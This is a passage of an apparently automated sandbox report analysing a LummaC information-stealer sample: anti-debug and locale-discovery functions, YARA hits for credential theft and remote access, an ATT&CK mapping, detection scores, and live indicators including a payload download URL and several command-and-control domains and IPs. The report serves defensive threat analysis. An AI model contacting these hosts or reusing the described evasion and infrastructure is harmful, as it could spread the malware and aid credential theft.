Source: C:\Users\user\AppData\Local\Temp\3247.tmp.exe | Code function: 3_2_00AE092B mov eax, dword ptr fs:[00000030h] 3_2_00AE092B
Source: C:\Users\user\AppData\Local\Temp\3247.tmp.exe | Code function: 3_2_00AE0D90 mov eax, dword ptr fs:[00000030h] 3_2_00AE0D90
Source: C:\Users\user\AppData\Local\Temp\3247.tmp.exe | Code function: 3_2_00BD9363 push dword ptr fs:[00000030h] 3_2_00BD9363
Source: C:\Users\user\Desktop\XIaCqh1vRm.exe | Code function: 0_2_0043BBC1 GetProcessHeap, 0_2_0043BBC1
Source: C:\Users\user\Desktop\XIaCqh1vRm.exe | Code function: 0_2_0042A3D3 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter, 0_2_0042A3D3
Source: C:\Users\user\Desktop\XIaCqh1vRm.exe | Code function: 0_2_004104D3 IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter, 0_2_004104D3
Source: C:\Users\user\Desktop\XIaCqh1vRm.exe | Code function: 0_2_00410666 SetUnhandledExceptionFilter, 0_2_00410666
Source: C:\Users\user\Desktop\XIaCqh1vRm.exe | Code function: 0_2_0040F911 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess, 0_2_0040F911
Source: C:\Users\user\Desktop\XIaCqh1vRm.exe | Code function: 0_2_024BA63A IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter, 0_2_024BA63A
Source: C:\Users\user\Desktop\XIaCqh1vRm.exe | Code function: 0_2_024A073A IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter, 0_2_024A073A
Source: C:\Users\user\Desktop\XIaCqh1vRm.exe | Code function: 0_2_0249FB78 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess, 0_2_0249FB78
Source: C:\Users\user\Desktop\XIaCqh1vRm.exe | Code function: 0_2_024A08CD SetUnhandledExceptionFilter, 0_2_024A08CD

                  HIPS / PFW / Operating System Protection Evasion

Source: 3247.tmp.exe | String found in binary or memory: debonairnukk.xyz
Source: 3247.tmp.exe | String found in binary or memory: diffuculttan.xyz
Source: 3247.tmp.exe | String found in binary or memory: effecterectz.xyz
Source: 3247.tmp.exe | String found in binary or memory: deafeninggeh.biz
Source: 3247.tmp.exe | String found in binary or memory: immureprech.biz
Source: C:\Users\user\Desktop\XIaCqh1vRm.exe | Process created: C:\Users\user\AppData\Local\Temp\3247.tmp.exe "C:\Users\user\AppData\Local\Temp\3247.tmp.exe"
Source: C:\Users\user\Desktop\XIaCqh1vRm.exe | Code function: 0_2_0041077B cpuid 0_2_0041077B
Source: C:\Users\user\Desktop\XIaCqh1vRm.exe | Code function: IsValidCodePage,_wcschr,_wcschr,GetLocaleInfoW, 0_2_0043B00A
Source: C:\Users\user\Desktop\XIaCqh1vRm.exe | Code function: GetLocaleInfoW, 0_2_004351C0
Source: C:\Users\user\Desktop\XIaCqh1vRm.exe | Code function: EnumSystemLocalesW, 0_2_0043B2CD
Source: C:\Users\user\Desktop\XIaCqh1vRm.exe | Code function: EnumSystemLocalesW, 0_2_0043B282
Source: C:\Users\user\Desktop\XIaCqh1vRm.exe | Code function: EnumSystemLocalesW, 0_2_0043B368
Source: C:\Users\user\Desktop\XIaCqh1vRm.exe | Code function: GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW, 0_2_0043B3F5
Source: C:\Users\user\Desktop\XIaCqh1vRm.exe | Code function: GetLocaleInfoW, 0_2_0043B645
Source: C:\Users\user\Desktop\XIaCqh1vRm.exe | Code function: GetLocaleInfoW,GetLocaleInfoW,GetACP, 0_2_0043B76E
Source: C:\Users\user\Desktop\XIaCqh1vRm.exe | Code function: GetLocaleInfoW, 0_2_0043B875
Source: C:\Users\user\Desktop\XIaCqh1vRm.exe | Code function: GetUserDefaultLCID,IsValidCodePage,IsValidLocale,GetLocaleInfoW,GetLocaleInfoW, 0_2_0043B942
Source: C:\Users\user\Desktop\XIaCqh1vRm.exe | Code function: EnumSystemLocalesW, 0_2_00434DCD
Source: C:\Users\user\Desktop\XIaCqh1vRm.exe | Code function: IsValidCodePage,_wcschr,_wcschr,GetLocaleInfoW, 0_2_024CB271
Source: C:\Users\user\Desktop\XIaCqh1vRm.exe | Code function: EnumSystemLocalesW, 0_2_024C5034
Source: C:\Users\user\Desktop\XIaCqh1vRm.exe | Code function: GetLocaleInfoW, 0_2_024C5427
Source: C:\Users\user\Desktop\XIaCqh1vRm.exe | Code function: EnumSystemLocalesW, 0_2_024CB4E9
Source: C:\Users\user\Desktop\XIaCqh1vRm.exe | Code function: EnumSystemLocalesW, 0_2_024CB534
Source: C:\Users\user\Desktop\XIaCqh1vRm.exe | Code function: EnumSystemLocalesW, 0_2_024CB5CF
Source: C:\Users\user\Desktop\XIaCqh1vRm.exe | Code function: GetLocaleInfoW, 0_2_024CBADC
Source: C:\Users\user\Desktop\XIaCqh1vRm.exe | Code function: GetUserDefaultLCID,IsValidCodePage,IsValidLocale,GetLocaleInfoW,GetLocaleInfoW, 0_2_024CBBA9
Source: C:\Users\user\Desktop\XIaCqh1vRm.exe | Code function: GetLocaleInfoW, 0_2_024CB8AC
Source: C:\Users\user\Desktop\XIaCqh1vRm.exe | Code function: GetLocaleInfoW, 0_2_024CB8A3
Source: C:\Users\user\Desktop\XIaCqh1vRm.exe | Code function: GetLocaleInfoW,GetLocaleInfoW,GetACP, 0_2_024CB9D5
Source: C:\Users\user\Desktop\XIaCqh1vRm.exe | Code function: 0_2_004103CD GetSystemTimeAsFileTime,GetCurrentThreadId,GetCurrentProcessId,QueryPerformanceCounter, 0_2_004103CD
Source: C:\Users\user\Desktop\XIaCqh1vRm.exe | Code function: 0_2_004163EA GetVersionExW,Concurrency::details::platform::InitializeSystemFunctionPointers,Concurrency::details::WinRT::Initialize,__CxxThrowException@8, 0_2_004163EA
Source: C:\Users\user\AppData\Local\Temp\3247.tmp.exe | Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid
Source: Amcache.hve.7.dr | Binary or memory string: c:\programdata\microsoft\windows defender\platform\4.18.23080.2006-0\msmpeng.exe
Source: Amcache.hve.7.dr | Binary or memory string: msmpeng.exe
Source: Amcache.hve.7.dr | Binary or memory string: c:\program files\windows defender\msmpeng.exe
Source: Amcache.hve.7.dr | Binary or memory string: c:\programdata\microsoft\windows defender\platform\4.18.23090.2006-0\msmpeng.exe
Source: Amcache.hve.7.dr | Binary or memory string: MsMpEng.exe

                  Stealing of Sensitive Information

                  Source: Yara match | File source: 3.2.3247.tmp.exe.400000.0.raw.unpack, type: UNPACKEDPE
                  Source: Yara match | File source: 3.2.3247.tmp.exe.400000.0.unpack, type: UNPACKEDPE
                  Source: Yara match | File source: 3.3.3247.tmp.exe.b30000.0.unpack, type: UNPACKEDPE
                  Source: Yara match | File source: 3.3.3247.tmp.exe.b30000.0.raw.unpack, type: UNPACKEDPE
                  Source: Yara match | File source: 00000003.00000003.1414275987.0000000000B30000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara match | File source: 00000003.00000002.1855825819.0000000000400000.00000040.00000001.01000000.00000006.sdmp, type: MEMORY
                  Source: Yara match | File source: 00000003.00000002.1856080903.0000000000AE0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara match | File source: sslproxydump.pcap, type: PCAP
                  Source: Yara match | File source: decrypted.memstr, type: MEMORYSTR

                  Remote Access Functionality

                  Source: Yara match | File source: 3.2.3247.tmp.exe.400000.0.raw.unpack, type: UNPACKEDPE
                  Source: Yara match | File source: 3.2.3247.tmp.exe.400000.0.unpack, type: UNPACKEDPE
                  Source: Yara match | File source: 3.3.3247.tmp.exe.b30000.0.unpack, type: UNPACKEDPE
                  Source: Yara match | File source: 3.3.3247.tmp.exe.b30000.0.raw.unpack, type: UNPACKEDPE
                  Source: Yara match | File source: 00000003.00000003.1414275987.0000000000B30000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara match | File source: 00000003.00000002.1855825819.0000000000400000.00000040.00000001.01000000.00000006.sdmp, type: MEMORY
                  Source: Yara match | File source: 00000003.00000002.1856080903.0000000000AE0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara match | File source: sslproxydump.pcap, type: PCAP
                  Source: Yara match | File source: decrypted.memstr, type: MEMORYSTR
                  Source: C:\Users\user\Desktop\XIaCqh1vRm.exe | Code function: 0_2_004218CC Concurrency::details::ContextBase::TraceContextEvent,Concurrency::details::InternalContextBase::SwitchOut,Concurrency::details::SchedulerBase::GetInternalContext,Concurrency::details::WorkItem::ResolveToken,Concurrency::details::WorkItem::BindTo,Concurrency::details::SchedulerBase::ReleaseInternalContext,Concurrency::details::InternalContextBase::SwitchTo,Concurrency::details::SchedulerBase::ReleaseInternalContext,0_2_004218CC
                  Source: C:\Users\user\Desktop\XIaCqh1vRm.exe | Code function: 0_2_00420BF6 Concurrency::details::SchedulerBase::GetInternalContext,Concurrency::details::WorkItem::ResolveToken,Concurrency::details::WorkItem::BindTo,Concurrency::details::SchedulerBase::ReleaseInternalContext,Concurrency::details::SchedulerBase::GetInternalContext,0_2_00420BF6
                  Source: C:\Users\user\Desktop\XIaCqh1vRm.exe | Code function: 0_2_024B1B33 Concurrency::details::ContextBase::TraceContextEvent,Concurrency::details::InternalContextBase::SwitchOut,Concurrency::details::SchedulerBase::GetInternalContext,Concurrency::details::WorkItem::ResolveToken,Concurrency::details::WorkItem::BindTo,Concurrency::details::SchedulerBase::ReleaseInternalContext,Concurrency::details::InternalContextBase::SwitchTo,Concurrency::details::SchedulerBase::ReleaseInternalContext,0_2_024B1B33
                  Source: C:\Users\user\Desktop\XIaCqh1vRm.exe | Code function: 0_2_024B0E5D Concurrency::details::SchedulerBase::GetInternalContext,Concurrency::details::WorkItem::ResolveToken,Concurrency::details::WorkItem::BindTo,Concurrency::details::SchedulerBase::ReleaseInternalContext,Concurrency::details::SchedulerBase::GetInternalContext,0_2_024B0E5D
                  ATT&CK matrix (one column per tactic; a number before a technique is the count of matched signatures)

                  Reconnaissance | Resource Development | Initial Access | Execution | Persistence | Privilege Escalation | Defense Evasion | Credential Access | Discovery | Lateral Movement | Collection | Command and Control | Exfiltration | Impact
                  Gather Victim Identity Information | Acquire Infrastructure | Valid Accounts | 2 Native API | 1 DLL Side-Loading | 11 Process Injection | 1 Masquerading | OS Credential Dumping | 1 System Time Discovery | Remote Services | 1 Screen Capture | 11 Encrypted Channel | Exfiltration Over Other Network Medium | Abuse Accessibility Features
                  Credentials | Domains | Default Accounts | 1 PowerShell | Boot or Logon Initialization Scripts | 1 DLL Side-Loading | 1 Virtualization/Sandbox Evasion | LSASS Memory | 1 Query Registry | Remote Desktop Protocol | 1 Archive Collected Data | 12 Ingress Tool Transfer | Exfiltration Over Bluetooth | Network Denial of Service
                  Email Addresses | DNS Server | Domain Accounts | At | Logon Script (Windows) | Logon Script (Windows) | 11 Process Injection | Security Account Manager | 131 Security Software Discovery | SMB/Windows Admin Shares | 3 Clipboard Data | 3 Non-Application Layer Protocol | Automated Exfiltration | Data Encrypted for Impact
                  Employee Names | Virtual Private Server | Local Accounts | Cron | Login Hook | Login Hook | 11 Deobfuscate/Decode Files or Information | NTDS | 1 Virtualization/Sandbox Evasion | Distributed Component Object Model | Input Capture | 124 Application Layer Protocol | Traffic Duplication | Data Destruction
                  Gather Victim Network Information | Server | Cloud Accounts | Launchd | Network Logon Script | Network Logon Script | 4 Obfuscated Files or Information | LSA Secrets | 1 Process Discovery | SSH | Keylogging | Fallback Channels | Scheduled Transfer | Data Encrypted for Impact
                  Domain Properties | Botnet | Replication Through Removable Media | Scheduled Task | RC Scripts | RC Scripts | 22 Software Packing | Cached Domain Credentials | 1 Application Window Discovery | VNC | GUI Input Capture | Multiband Communication | Data Transfer Size Limits | Service Stop
                  DNS | Web Services | External Remote Services | Systemd Timers | Startup Items | Startup Items | 1 DLL Side-Loading | DCSync | 2 File and Directory Discovery | Windows Remote Management | Web Portal Capture | Commonly Used Port | Exfiltration Over C2 Channel | Inhibit System Recovery
                  Network Trust Dependencies | Serverless | Drive-by Compromise | Container Orchestration Job | Scheduled Task/Job | Scheduled Task/Job | Indicator Removal from Tools | Proc Filesystem | 24 System Information Discovery | Cloud Services | Credential API Hooking | Application Layer Protocol | Exfiltration Over Alternative Protocol | Defacement
                  Behavior Graph ID: 1575128 | Sample: XIaCqh1vRm.exe | Startdate: 14/12/2024 | Architecture: WINDOWS | Score: 100

                  • Start: DNS/IP: effecterectz.xyz; diffuculttan.xyz; 8 other IPs or domains. Signatures: Suricata IDS alerts for network traffic; Found malware configuration; Malicious sample detected (through community Yara rule); 12 other signatures. Started: XIaCqh1vRm.exe
                  • diffuculttan.xyz: Signature: Performs DNS queries to domains with low reputation
                  • XIaCqh1vRm.exe (1 created registry value, 17 created files): DNS/IP: 176.113.115.19, 49711, 80 SELECTELRU Russian Federation; post-to-me.com 104.21.56.70, 443, 49710 CLOUDFLARENETUS United States. Dropped: C:\Users\user\AppData\Local\...\3247.tmp.exe, PE32; C:\Users\user\...\ScreenUpdateSync[1].exe, PE32. Signature: Detected unpacking (overwrites its own PE header). Started: 3247.tmp.exe
                  • 3247.tmp.exe: DNS/IP: immureprech.biz 104.21.22.222, 443, 49727 CLOUDFLARENETUS United States; deafeninggeh.biz 104.21.96.1, 443, 49739 CLOUDFLARENETUS United States; steamcommunity.com 104.102.49.254, 443, 49754 AKAMAI-ASUS United States. Signatures: Antivirus detection for dropped file; Multi AV Scanner detection for dropped file; Detected unpacking (changes PE section rights); 2 other signatures. Started: WerFault.exe
                  • WerFault.exe (19 created registry values, 16 created files): Dropped: C:\ProgramData\Microsoft\...\Report.wer, Unicode

                  Source | Detection | Scanner | Label | Link
                  XIaCqh1vRm.exe | 42% | Virustotal | |
                  XIaCqh1vRm.exe | 47% | ReversingLabs | Win32.Trojan.LummaC |
                  XIaCqh1vRm.exe | 100% | Avira | HEUR/AGEN.1312567 |
                  XIaCqh1vRm.exe | 100% | Joe Sandbox ML | |
                  Source | Detection | Scanner | Label | Link
                  C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\W9FILL1W\ScreenUpdateSync[1].exe | 100% | Avira | HEUR/AGEN.1312567 |
                  C:\Users\user\AppData\Local\Temp\3247.tmp.exe | 100% | Avira | HEUR/AGEN.1312567 |
                  C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\W9FILL1W\ScreenUpdateSync[1].exe | 100% | Joe Sandbox ML | |
                  C:\Users\user\AppData\Local\Temp\3247.tmp.exe | 100% | Joe Sandbox ML | |
                  C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\W9FILL1W\ScreenUpdateSync[1].exe | 42% | ReversingLabs | |
                  C:\Users\user\AppData\Local\Temp\3247.tmp.exe | 42% | ReversingLabs | |
                  No Antivirus matches
                  No Antivirus matches
                  Source | Detection | Scanner | Label | Link
                  https://post-to-me.com/track_prt.php?sub=0&cc=DEU-c/ | 100% | Avira URL Cloud | malware |
                  http://176.113.115.19/ScreenUpdateSync.exeW | 0% | Avira URL Cloud | safe |
                  http://176.113.115.19/ScreenUpdateSync.exe | 100% | Avira URL Cloud | malware |
                  https://wrathful-jammy.cyou/z | 100% | Avira URL Cloud | malware |
                  https://post-to-me.com/track_prt.php?sub=0&cc=DEQ | 100% | Avira URL Cloud | malware |
                  https://immureprech.biz/apix | 100% | Avira URL Cloud | malware |
                  https://post-to-me.com/track_prt.php?sub=0&cc=DE6 | 100% | Avira URL Cloud | malware |
                  Name | IP | Active | Malicious | Antivirus Detection | Reputation
                  post-to-me.com | 104.21.56.70 | true | false | | high
                  steamcommunity.com | 104.102.49.254 | true | false | | high
                  immureprech.biz | 104.21.22.222 | true | false | | high
                  deafeninggeh.biz | 104.21.96.1 | true | false | | high
                  sordid-snaked.cyou | unknown | unknown | false | | high
                  diffuculttan.xyz | unknown | unknown | false | | high
                  effecterectz.xyz | unknown | unknown | false | | high
                  awake-weaves.cyou | unknown | unknown | false | | high
                  wrathful-jammy.cyou | unknown | unknown | false | | high
                  debonairnukk.xyz | unknown | unknown | false | | high
                  Name | Malicious | Antivirus Detection | Reputation
                  sordid-snaked.cyou | false | | high
                  deafeninggeh.biz | false | | high
                  effecterectz.xyz | false | | high
                  wrathful-jammy.cyou | false | | high
                  https://steamcommunity.com/profiles/76561199724331900 | false | | high
                  awake-weaves.cyou | false | | high
                  immureprech.biz | false | | high
                  https://immureprech.biz/api | false | | high
                  debonairnukk.xyz | false | | high
                  diffuculttan.xyz | false | | high
                  https://post-to-me.com/track_prt.php?sub=0&cc=DE | false | | high
                  https://deafeninggeh.biz/api | false | | high
                  Name | Source | Malicious | Antivirus Detection | Reputation
                  https://community.fastly.steamstatic.com/public/shared/images/responsive/header_menu_hamburger.png | 3247.tmp.exe, 00000003.00000003.1550191259.0000000000CA9000.00000004.00000020.00020000.00000000.sdmp, 3247.tmp.exe, 00000003.00000003.1550898061.0000000000CAE000.00000004.00000020.00020000.00000000.sdmp | false | | high
                  https://player.vimeo.com | 3247.tmp.exe, 00000003.00000003.1550738493.0000000000C44000.00000004.00000020.00020000.00000000.sdmp | false | | high
                  https://community.fastly.steamstatic.com/public/css/promo/summer2017/stickers.css?v=Ncr6N09yZIap&amp | 3247.tmp.exe, 00000003.00000003.1550191259.0000000000CA9000.00000004.00000020.00020000.00000000.sdmp, 3247.tmp.exe, 00000003.00000003.1550898061.0000000000CAE000.00000004.00000020.00020000.00000000.sdmp | false | | high
                  http://crl.microsoft | XIaCqh1vRm.exe, 00000000.00000003.1349903583.0000000000AB1000.00000004.00000020.00020000.00000000.sdmp, XIaCqh1vRm.exe, 00000000.00000003.1351268166.0000000000AB1000.00000004.00000020.00020000.00000000.sdmp | false | | high
                  https://steamcommunity.com/?subsection=broadcasts | 3247.tmp.exe, 00000003.00000003.1550191259.0000000000CA9000.00000004.00000020.00020000.00000000.sdmp, 3247.tmp.exe, 00000003.00000003.1550898061.0000000000CAE000.00000004.00000020.00020000.00000000.sdmp | false | | high
                  http://176.113.115.19/ScreenUpdateSync.exeW | XIaCqh1vRm.exe, 00000000.00000002.3744603190.0000000000A80000.00000004.00000020.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
                  https://store.steampowered.com/subscriber_agreement/ | 3247.tmp.exe, 00000003.00000003.1550191259.0000000000CA9000.00000004.00000020.00020000.00000000.sdmp, 3247.tmp.exe, 00000003.00000003.1550898061.0000000000CAE000.00000004.00000020.00020000.00000000.sdmp | false | | high
                  https://www.gstatic.cn/recaptcha/ | 3247.tmp.exe, 00000003.00000003.1550738493.0000000000C44000.00000004.00000020.00020000.00000000.sdmp | false | | high
                  http://176.113.115.19/ScreenUpdateSync.exe | XIaCqh1vRm.exe, XIaCqh1vRm.exe, 00000000.00000002.3744603190.0000000000A80000.00000004.00000020.00020000.00000000.sdmp, XIaCqh1vRm.exe, 00000000.00000002.3744603190.0000000000A97000.00000004.00000020.00020000.00000000.sdmp | false | Avira URL Cloud: malware | unknown
                  http://www.valvesoftware.com/legal.htm | 3247.tmp.exe, 00000003.00000003.1550191259.0000000000CA9000.00000004.00000020.00020000.00000000.sdmp, 3247.tmp.exe, 00000003.00000003.1550898061.0000000000CAE000.00000004.00000020.00020000.00000000.sdmp | false | | high
                  https://community.fastly.steamstatic.com/public/shared/css/shared_global.css?v=wuA4X_n5-mo0&l=en | 3247.tmp.exe, 00000003.00000003.1550191259.0000000000CA9000.00000004.00000020.00020000.00000000.sdmp, 3247.tmp.exe, 00000003.00000003.1550898061.0000000000CAE000.00000004.00000020.00020000.00000000.sdmp | false | | high
                  https://www.youtube.com | 3247.tmp.exe, 00000003.00000003.1550738493.0000000000C44000.00000004.00000020.00020000.00000000.sdmp | false | | high
                  https://www.google.com | 3247.tmp.exe, 00000003.00000003.1550738493.0000000000C44000.00000004.00000020.00020000.00000000.sdmp | false | | high
                  https://www.valvesoftware.com/en/contact?contact-person=Translation%20Team%20Feedback | 3247.tmp.exe, 00000003.00000003.1550191259.0000000000CA9000.00000004.00000020.00020000.00000000.sdmp, 3247.tmp.exe, 00000003.00000003.1550898061.0000000000CAE000.00000004.00000020.00020000.00000000.sdmp | false | | high
                  https://community.fastly.steamstatic.com/public/javascript/applications/community/libraries~b28b7af6 | 3247.tmp.exe, 00000003.00000003.1550218661.0000000000C24000.00000004.00000020.00020000.00000000.sdmp, 3247.tmp.exe, 00000003.00000003.1550191259.0000000000CA9000.00000004.00000020.00020000.00000000.sdmp, 3247.tmp.exe, 00000003.00000003.1550898061.0000000000CAE000.00000004.00000020.00020000.00000000.sdmp | false | | high
                  https://wrathful-jammy.cyou/z | 3247.tmp.exe, 00000003.00000002.1856295839.0000000000C45000.00000004.00000020.00020000.00000000.sdmp, 3247.tmp.exe, 00000003.00000003.1550218661.0000000000C42000.00000004.00000020.00020000.00000000.sdmp, 3247.tmp.exe, 00000003.00000003.1550738493.0000000000C44000.00000004.00000020.00020000.00000000.sdmp | false | Avira URL Cloud: malware | unknown
                  https://cdn.fastly.steamstatic.com/steamcommunity/public/assets/ | 3247.tmp.exe, 00000003.00000003.1550738493.0000000000C44000.00000004.00000020.00020000.00000000.sdmp | false | | high
                  https://community.fastly.steamstatic.com/public/shared/css/motiva_sans.css?v=-yZgCk0Nu7kH&l=engl | 3247.tmp.exe, 00000003.00000003.1550898061.0000000000CAE000.00000004.00000020.00020000.00000000.sdmp | false | | high
                  https://community.fastly.steamstatic.com/public/css/skin_1/profilev2.css?v=fe66ET2uI50l&l=englis | 3247.tmp.exe, 00000003.00000003.1550191259.0000000000CA9000.00000004.00000020.00020000.00000000.sdmp, 3247.tmp.exe, 00000003.00000003.1550898061.0000000000CAE000.00000004.00000020.00020000.00000000.sdmp | false | | high
                  https://community.fastly.steamstatic.com/public/javascript/applications/community/main.js?v=Cx79WC7T | 3247.tmp.exe, 00000003.00000003.1550218661.0000000000C24000.00000004.00000020.00020000.00000000.sdmp, 3247.tmp.exe, 00000003.00000003.1550191259.0000000000CA9000.00000004.00000020.00020000.00000000.sdmp, 3247.tmp.exe, 00000003.00000003.1550898061.0000000000CAE000.00000004.00000020.00020000.00000000.sdmp | false | | high
                  https://community.fastly.steamstatic.com/public/javascript/scriptaculous/_combined.js?v=pbdAKOcDIgbC | 3247.tmp.exe, 00000003.00000003.1550191259.0000000000CA9000.00000004.00000020.00020000.00000000.sdmp, 3247.tmp.exe, 00000003.00000003.1550898061.0000000000CAE000.00000004.00000020.00020000.00000000.sdmp | false | | high
                  https://s.ytimg.com; | 3247.tmp.exe, 00000003.00000003.1550738493.0000000000C44000.00000004.00000020.00020000.00000000.sdmp | false | | high
                  https://community.fastly.steamstatic.com/public/images/skin_1/footerLogo_valve.png?v=1 | 3247.tmp.exe, 00000003.00000003.1550918177.0000000000C20000.00000004.00000020.00020000.00000000.sdmp, 3247.tmp.exe, 00000003.00000003.1550191259.0000000000CA9000.00000004.00000020.00020000.00000000.sdmp, 3247.tmp.exe, 00000003.00000003.1550898061.0000000000CAE000.00000004.00000020.00020000.00000000.sdmp | false | | high
                  https://community.fastly.steamstatic.com/public/shared/css/buttons.css?v=qhQgyjWi6LgJ&l=english& | 3247.tmp.exe, 00000003.00000003.1550191259.0000000000CA9000.00000004.00000020.00020000.00000000.sdmp, 3247.tmp.exe, 00000003.00000003.1550898061.0000000000CAE000.00000004.00000020.00020000.00000000.sdmp | false | | high
                  https://community.fastly.steamstatic.com/ | 3247.tmp.exe, 00000003.00000003.1550738493.0000000000C44000.00000004.00000020.00020000.00000000.sdmp | false | | high
                  https://steam.tv/ | 3247.tmp.exe, 00000003.00000003.1550738493.0000000000C44000.00000004.00000020.00020000.00000000.sdmp | false | | high
                  https://post-to-me.com/track_prt.php?sub=&cc=DE | XIaCqh1vRm.exe, 00000000.00000002.3743015579.0000000000400000.00000040.00000001.01000000.00000003.sdmp | false | | high
                  https://community.fastly.steamstatic.com/public/javascript/webui/clientcom.js?v=ImL_uti9QFBw&l=e | 3247.tmp.exe, 00000003.00000003.1550191259.0000000000CA9000.00000004.00000020.00020000.00000000.sdmp, 3247.tmp.exe, 00000003.00000003.1550898061.0000000000CAE000.00000004.00000020.00020000.00000000.sdmp | false | | high
                  https://community.fastly.steamstatic.com/public/javascript/applications/community/manifest.js?v=foEB | 3247.tmp.exe, 00000003.00000003.1550218661.0000000000C24000.00000004.00000020.00020000.00000000.sdmp, 3247.tmp.exe, 00000003.00000003.1550191259.0000000000CA9000.00000004.00000020.00020000.00000000.sdmp, 3247.tmp.exe, 00000003.00000003.1550898061.0000000000CAE000.00000004.00000020.00020000.00000000.sdmp | false | | high
                  https://community.fastly.steamstatic.com/public/javascript/promo/stickers.js?v=CcLRHsa04otQ&l=en | 3247.tmp.exe, 00000003.00000003.1550191259.0000000000CA9000.00000004.00000020.00020000.00000000.sdmp, 3247.tmp.exe, 00000003.00000003.1550898061.0000000000CAE000.00000004.00000020.00020000.00000000.sdmp | false | | high
                  http://store.steampowered.com/privacy_agreement/ | 3247.tmp.exe, 00000003.00000003.1550918177.0000000000C20000.00000004.00000020.00020000.00000000.sdmp, 3247.tmp.exe, 00000003.00000003.1550191259.0000000000CA9000.00000004.00000020.00020000.00000000.sdmp, 3247.tmp.exe, 00000003.00000003.1550898061.0000000000CAE000.00000004.00000020.00020000.00000000.sdmp | false | | high
                  https://store.steampowered.com/points/shop/ | 3247.tmp.exe, 00000003.00000003.1550191259.0000000000CA9000.00000004.00000020.00020000.00000000.sdmp, 3247.tmp.exe, 00000003.00000003.1550898061.0000000000CAE000.00000004.00000020.00020000.00000000.sdmp | false | | high
                  https://community.fastly.steamstatic.com/public/javascript/modalv2.js?v=zBXEuexVQ0FZ&l=english&a | 3247.tmp.exe, 00000003.00000003.1550191259.0000000000CA9000.00000004.00000020.00020000.00000000.sdmp, 3247.tmp.exe, 00000003.00000003.1550898061.0000000000CAE000.00000004.00000020.00020000.00000000.sdmp | false | | high
                  https://sketchfab.com | 3247.tmp.exe, 00000003.00000003.1550738493.0000000000C44000.00000004.00000020.00020000.00000000.sdmp | false | | high
                  https://lv.queniujq.cn | 3247.tmp.exe, 00000003.00000003.1550738493.0000000000C44000.00000004.00000020.00020000.00000000.sdmp | false | | high
                  https://steamcommunity.com/profiles/76561199724331900/inventory/ | 3247.tmp.exe, 00000003.00000003.1550918177.0000000000C20000.00000004.00000020.00020000.00000000.sdmp, 3247.tmp.exe, 00000003.00000003.1550191259.0000000000CA9000.00000004.00000020.00020000.00000000.sdmp, 3247.tmp.exe, 00000003.00000003.1550898061.0000000000CAE000.00000004.00000020.00020000.00000000.sdmp | false | | high
                  https://www.youtube.com/ | 3247.tmp.exe, 00000003.00000003.1550738493.0000000000C44000.00000004.00000020.00020000.00000000.sdmp | false | | high
                  https://store.steampowered.com/privacy_agreement/ | 3247.tmp.exe, 00000003.00000003.1550191259.0000000000CA9000.00000004.00000020.00020000.00000000.sdmp, 3247.tmp.exe, 00000003.00000003.1550898061.0000000000CAE000.00000004.00000020.00020000.00000000.sdmp | false | | high
                  https://community.fastly.steamstatic.com/public/css/skin_1/modalContent.css?v=WXAusLHclDIt&l=eng | 3247.tmp.exe, 00000003.00000003.1550191259.0000000000CA9000.00000004.00000020.00020000.00000000.sdmp, 3247.tmp.exe, 00000003.00000003.1550898061.0000000000CAE000.00000004.00000020.00020000.00000000.sdmp | false | | high
                  https://post-to-me.com/track_prt.php?sub= | XIaCqh1vRm.exe | false | | high
                  https://post-to-me.com/track_prt.php?sub=0&cc=DEU-c/ | XIaCqh1vRm.exe, 00000000.00000002.3744603190.0000000000A46000.00000004.00000020.00020000.00000000.sdmp | false | Avira URL Cloud: malware | unknown
                  https://community.fastly.steamstatic.com/public/javascript/global.js?v=jWc2JLWHx5Kn&l=english&am | 3247.tmp.exe, 00000003.00000003.1550191259.0000000000CA9000.00000004.00000020.00020000.00000000.sdmp, 3247.tmp.exe, 00000003.00000003.1550898061.0000000000CAE000.00000004.00000020.00020000.00000000.sdmp | false | | high
                                                                                                                                          high
                                                                                                                                          https://www.google.com/recaptcha/3247.tmp.exe, 00000003.00000003.1550738493.0000000000C44000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                            high
                                                                                                                                            https://checkout.steampowered.com/3247.tmp.exe, 00000003.00000003.1550738493.0000000000C44000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                              high
                                                                                                                                              https://post-to-me.com/XIaCqh1vRm.exe, 00000000.00000002.3744603190.0000000000A80000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                high
                                                                                                                                                https://post-to-me.com/track_prt.php?sub=0&cc=DEQXIaCqh1vRm.exe, 00000000.00000002.3744603190.0000000000A80000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                • Avira URL Cloud: malware
                                                                                                                                                unknown
                                                                                                                                                https://store.steampowered.com/;3247.tmp.exe, 00000003.00000003.1550738493.0000000000C44000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                  high
                                                                                                                                                  https://store.steampowered.com/about/3247.tmp.exe, 00000003.00000003.1550898061.0000000000CAE000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                    high
                                                                                                                                                    https://steamcommunity.com/my/wishlist/3247.tmp.exe, 00000003.00000003.1550191259.0000000000CA9000.00000004.00000020.00020000.00000000.sdmp, 3247.tmp.exe, 00000003.00000003.1550898061.0000000000CAE000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                      high
